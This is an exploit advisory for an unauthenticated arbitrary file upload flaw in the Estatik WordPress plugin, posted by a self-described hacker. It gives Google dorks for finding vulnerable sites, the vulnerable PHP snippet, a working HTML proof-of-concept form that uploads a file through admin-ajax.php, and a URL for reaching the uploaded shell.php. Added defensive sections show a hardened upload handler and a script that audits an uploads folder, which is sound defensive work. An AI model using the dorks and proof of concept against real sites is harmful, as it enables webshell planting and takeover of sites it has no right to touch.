<!--

     \ \   / (_)_ __ _   _ ___\ \/ /  _ \ ____
      \ \ / /| | '__| | | / __|\  /| | | |_  /
       \ V / | | |  | |_| \__ \/  \| |_| |/ / 
        \_/  |_|_|   \__,_|___/_/\_\____//___|
		
                                               -->
#########################################################
#Exploit Title: Arbitrary File Upload Vulnerability in Estatik
#Category: webapps
#Google Dork : inurl:/wp-content/plugins/estatik/
             : index of "/wp-content/plugins/estatik/"
#########################################################

[+] In that function the following code saves each uploaded file sent with a request to the AJAX function:

$image_name = time()."_".$_FILES['es_media_images']['name'][$i];   // file name taken verbatim from the request; no extension or type check

$sourcePath = $_FILES['es_media_images']['tmp_name'][$i];

$targetPath = $upload_dir['path']."/".$image_name;                 // current month's directory under /wp-content/uploads/

move_uploaded_file($sourcePath, $targetPath);                      // moved as-is, so a .php file stays executable

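The snippet above trusts the client-supplied file name and moves the file without checking its type, and the proof-of-concept form further down sends nothing but the action parameter and the file. The handler below is an added example of how the same upload can be done safely; it is not Estatik's code. It assumes the same es_prop_media_images action name and $_FILES['es_media_images'] array layout shown above, that it runs inside WordPress (current_user_can, check_ajax_referer, wp_check_filetype_and_ext, wp_handle_upload and wp_send_json_* are WordPress core functions), and that the nonce action name es_media_upload and request field nonce are names chosen for this example.

```php
<?php
// Added example, not the plugin's code: hardened replacement for the
// es_prop_media_images AJAX upload handler. Assumes it is loaded inside
// WordPress and keeps the original array-style $_FILES['es_media_images'] shape.

// Registered for logged-in users only: no wp_ajax_nopriv_ hook, so an
// anonymous POST to admin-ajax.php reaches nothing.
add_action('wp_ajax_es_prop_media_images', 'es_prop_media_images_hardened');

function es_prop_media_images_hardened() {
    // 1. Authorisation: the caller must be allowed to upload files ...
    if (!current_user_can('upload_files')) {
        wp_send_json_error('insufficient privileges', 403);
    }
    // ... and must present a valid nonce (action/field names are assumptions for this example).
    check_ajax_referer('es_media_upload', 'nonce');

    if (empty($_FILES['es_media_images']['name']) || !is_array($_FILES['es_media_images']['name'])) {
        wp_send_json_error('no files', 400);
    }

    // Image-only allow list; anything else (php, phtml, html, svg, ...) is refused.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $saved = array();

    foreach ($_FILES['es_media_images']['name'] as $i => $name) {
        if ($_FILES['es_media_images']['error'][$i] !== UPLOAD_ERR_OK) {
            continue;
        }

        // Reshape the array-style entry into the single-file shape wp_handle_upload() expects.
        $file = array(
            'name'     => sanitize_file_name($name),
            'type'     => $_FILES['es_media_images']['type'][$i],
            'tmp_name' => $_FILES['es_media_images']['tmp_name'][$i],
            'error'    => $_FILES['es_media_images']['error'][$i],
            'size'     => $_FILES['es_media_images']['size'][$i],
        );

        // 2. Type check from the file name AND the bytes on disk (WordPress uses finfo
        //    for images), never from the client-sent Content-Type.
        $check = wp_check_filetype_and_ext($file['tmp_name'], $file['name'], $allowed);
        if (empty($check['ext']) || empty($check['type'])) {
            continue; // shell.php, shell.php.jpg, mismatched content: all rejected here
        }
        if (@getimagesize($file['tmp_name']) === false) {
            continue; // must actually decode as an image
        }

        // 3. Let WordPress move it: the allow list is applied again, name collisions
        //    are handled and the file lands in the dated uploads subdirectory.
        $result = wp_handle_upload($file, array(
            'test_form' => false,
            'mimes'     => $allowed,
        ));
        if (isset($result['error'])) {
            continue;
        }
        $saved[] = $result['url'];
    }

    wp_send_json_success($saved);
}
```

The three checks are independent: the capability and nonce stop the unauthenticated request the proof of concept relies on, the allow list stops a logged-in user from dropping a script, and letting wp_handle_upload() do the move keeps the destination and naming under WordPress control instead of the raw move_uploaded_file() above.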

[+] Proof of Concept:

The following proof of concept will upload the selected file and put it in the current
month’s directory inside of the /wp-content/uploads/ directory.
The name of the file in the upload directory will be the time the file
was saved, as output by the function time(), followed by a “_”
and then the name of the file as it was uploaded.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="es_prop_media_images" />
<input type="file" name="es_media_images[]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>


[+] Shell access:

http://www.Target.com/wp-content/uploads/time/shell.php

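Since the advisory spells out where an uploaded file lands (the current month's folder under /wp-content/uploads/) and how it is named (time() plus "_" plus the original name), a site owner can check whether such a file is already present. The script below is an added example, not part of the paste or of the plugin: a stand-alone, read-only PHP command-line audit that walks an uploads directory and reports files with a script extension, a PHP open tag in their content, or an .htaccess that could re-enable execution there. The directory path (argument, defaulting to wp-content/uploads) is an assumption about the site layout.

```php
<?php
// Added example (not from the paste or the Estatik plugin): audit a WordPress
// uploads directory for files that are scripts rather than media. Read-only.
// Usage: php audit-uploads.php /var/www/html/wp-content/uploads
// The default path below is an assumption about the site layout.

$root = $argv[1] ?? 'wp-content/uploads';
if (!is_dir($root)) {
    fwrite(STDERR, "not a directory: $root\n");
    exit(2);
}

// Extensions that should never be served from an uploads directory.
$scriptExt = array('php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'pht', 'shtml', 'cgi', 'pl');

$findings = array();
$it = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
);

foreach ($it as $file) {
    if (!$file->isFile()) {
        continue;
    }
    $path    = $file->getPathname();
    $name    = $file->getFilename();
    $reasons = array();

    // A script extension anywhere in the name (catches shell.php and shell.php.jpg alike).
    foreach (explode('.', strtolower($name)) as $part) {
        if (in_array($part, $scriptExt, true)) {
            $reasons[] = "script extension '$part'";
            break;
        }
    }

    // Content check: a PHP open tag in the first 4 KiB is suspicious whatever the name says.
    $head = @file_get_contents($path, false, null, 0, 4096);
    if ($head !== false && preg_match('/<\?(php\b|=)/i', $head)) {
        $reasons[] = 'contains PHP open tag';
    }

    // An .htaccess dropped into uploads can re-enable script execution there.
    if ($name === '.htaccess') {
        $reasons[] = '.htaccess inside uploads';
    }

    if ($reasons) {
        // The advisory's naming scheme (unix time, underscore, original name) is noted
        // as context only: legitimate plugin uploads use it too, so it is not a finding on its own.
        if (preg_match('/^\d{10}_/', $name)) {
            $reasons[] = 'time()_ prefixed name (matches the upload handler above)';
        }
        $findings[] = array(
            'mtime'   => date('c', $file->getMTime()),
            'path'    => $path,
            'reasons' => $reasons,
        );
    }
}

// Oldest first, so the earliest drop stands out when several files are found.
usort($findings, function ($a, $b) { return strcmp($a['mtime'], $b['mtime']); });
foreach ($findings as $f) {
    printf("%s  %s  [%s]\n", $f['mtime'], $f['path'], implode('; ', $f['reasons']));
}
exit($findings ? 1 : 0);
```

The exit status is 1 when anything was reported, so the script can run from cron or a deploy pipeline and fail loudly. The modification time printed for each hit is the same time() value the handler above bakes into the file name, which gives a starting point for log review.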
Video
https://youtu.be/G80_JRsuY88
Bye..
Algerien Hacker